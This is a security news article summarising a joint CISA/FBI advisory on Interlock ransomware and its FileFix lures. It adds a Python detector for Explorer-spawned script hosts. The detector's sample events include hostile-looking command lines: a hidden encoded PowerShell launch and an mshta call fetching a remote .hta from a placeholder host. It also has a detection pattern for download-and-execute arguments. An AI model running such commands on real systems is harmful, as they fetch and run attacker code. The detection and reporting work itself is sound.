Interlock Ransomware Escalates Attacks: CISA and FBI Warn of Drive-By Downloads and FileFix Social Engineering
Federal agencies are sounding the alarm as the Interlock ransomware operation intensifies attacks against critical infrastructure and healthcare organizations. In a joint advisory released Tuesday, CISA, FBI, HHS, and MS-ISAC revealed that the group—active since September 2024—has refined dangerous tactics to breach networks, steal data, and extort victims.
Unconventional Infiltration Methods
Investigators highlight Interlock's use of drive-by downloads from compromised legitimate websites—a rarity among ransomware gangs—to gain initial access. Once inside, attackers deploy remote access trojans like NodeSnake and execute double extortion: encrypting systems while threatening to leak stolen data unless ransoms are paid. Recent high-profile victims include healthcare giants DaVita (1.5TB exfiltrated) and Kettering Health.
CISA's alert details Interlock's evolving tactics
The FileFix Social Engineering Twist
Recently, Interlock adopted FileFix—a technique exploiting trusted Windows UI elements like File Explorer and HTML Applications (.HTA). Attackers disguise malicious PowerShell/JavaScript code within seemingly legitimate interfaces, bypassing security warnings entirely. This psychological manipulation targets human vulnerabilities rather than technical ones.
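From a detection standpoint, the common thread in the FileFix description above is that a script host (PowerShell, or mshta.exe for an .HTA file) ends up being launched by File Explorer itself rather than by a terminal, installer or scheduled task. The following is an added example, not code from the advisory or from BleepingComputer: a small Python triage routine that scans simplified, constructed process-creation records (Sysmon Event ID 1 style fields Image, ParentImage, CommandLine) for explorer.exe spawning a script host, and raises the severity when the command line also carries download-and-run style arguments. The SCRIPT_HOSTS set, the SUSPICIOUS_ARGS patterns, the sample events and the example.invalid URL are all assumptions constructed for this example and should be tuned to your environment.

```python
"""Heuristic triage of Explorer-spawned script interpreters in process-creation telemetry.

Added example (not from the CISA/FBI advisory). Input records are a constructed,
simplified Sysmon Event ID 1-style shape: RecordId, Image, ParentImage, CommandLine.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Script hosts a user would end up launching from the File Explorer address bar
# or by opening an HTML Application. mshta.exe is the host for .hta files; the
# set itself is an assumption to adjust for your estate.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Command-line fragments associated with hidden or download-and-execute use.
# Heuristic only; an empty match just lowers confidence, it does not clear the event.
SUSPICIOUS_ARGS = re.compile(
    r"-enc(odedcommand)?\b|invoke-expression|\biex\b|downloadstring|"
    r"\.hta\b|https?://|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass
class Finding:
    record_id: str
    reason: str
    severity: str  # "medium" or "high"


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> Optional[Finding]:
    """Classify one process-creation record; None means no Explorer-to-script-host edge."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return None
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(cmd)})
    if hits:
        return Finding(event["RecordId"],
                       f"{image} spawned by Explorer with {', '.join(hits)}", "high")
    # Explorer -> powershell.exe with a bare command line also happens when a user
    # opens a shell from a folder, so this is flagged for review, not as an incident.
    return Finding(event["RecordId"],
                   f"{image} spawned by Explorer (no suspicious arguments; possibly interactive)",
                   "medium")


def scan(events: Iterable[Dict[str, str]]) -> List[Finding]:
    """Run evaluate() over a stream of records and keep only the findings."""
    return [f for f in map(evaluate, events) if f is not None]


# Constructed sample telemetry (not real IoCs); the base64 blob is a placeholder.
SAMPLE_EVENTS = [
    {"RecordId": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc UEFZTE9BRF9QTEFDRUhPTERFUg=="},
    {"RecordId": "2", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"RecordId": "3", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"RecordId": "4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/lure.hta"},
    {"RecordId": "5", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity.upper()}] record {finding.record_id}: {finding.reason}")
```

The parent/child relationship is the durable signal here: argument patterns change from campaign to campaign, so the rule keys on explorer.exe launching a script host and uses the command line only to rank findings. Expect medium-severity hits from administrators who open PowerShell from a folder; those are the cases to baseline per host rather than suppress globally.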
Mitigation Imperatives
The advisory prescribes concrete defenses:
- DNS filtering and web application firewalls to block malicious traffic
- Network segmentation to limit lateral movement
- Strict identity/access management with mandatory MFA
- Continuous patching of systems and firmware
- User training to recognize social engineering lures
"Interlock's evolution underscores how ransomware groups are weaponizing both technical loopholes and human psychology," notes the FBI analysis. "Defense now requires equal emphasis on technological controls and user awareness."
Why This Matters Beyond Healthcare
While healthcare remains Interlock's primary target, the group's success with novel attack vectors sets a dangerous precedent for all sectors. The FBI's disclosure of recent IOCs (as recent as June 2025) provides actionable intelligence, but the real lesson is strategic: reactive security is insufficient against adversaries blending social engineering with advanced encryption. As ransomware groups innovate, organizations must preemptively harden both infrastructure and human firewalls.
Source: CISA/FBI/HHS/MS-ISAC Joint Advisory, BleepingComputer